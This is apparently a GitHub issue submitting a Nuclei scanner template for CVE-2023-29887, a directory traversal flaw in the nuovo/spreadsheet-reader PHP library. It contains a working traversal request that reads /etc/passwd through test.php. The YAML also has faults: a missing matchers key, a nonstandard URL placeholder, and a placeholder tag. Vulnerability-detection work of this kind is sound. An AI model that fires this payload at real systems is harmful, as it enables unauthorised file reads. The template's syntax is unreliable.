### ISSUE TITLE
CVE-2023-29887.yaml

### ISSUE THREAD

**Issue by ctflearner** [projectdiscovery/nuclei-templates#7261]
### Template Information:

This nuclei template detects the presence of a directory traversal vulnerability in nuovo/spreadsheet-reader package  0.5.11. 

Reference :
-  https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/
- https://nvd.nist.gov/vuln/detail/CVE-2023-29887

### Nuclei Template:

```yaml
id: CVE-2023-29887
info:
  name: Directory Traversal in nuovo/spreadsheet-reader 0.5.11
  description: |
    This nuclei template detects the presence of a directory traversal vulnerability in nuovo/spreadsheet-reader package  0.5.11.
  author: ctflearner
  severity: high
  tags:
    - web
    - directory traversal
    - nuovo
    - spreadsheet-reader
    - lfi
    - xxxxx
  reference: 
       - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29887
       - https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/ 
       - https://nvd.nist.gov/vuln/detail/CVE-2023-29887
  classification: 
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2023-29887
     cwe-id: CWE-22
     cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:*
requests:
  - method: GET
    path:
      - "{baseurl}/vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"
    matchers-condition: and
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0"
```
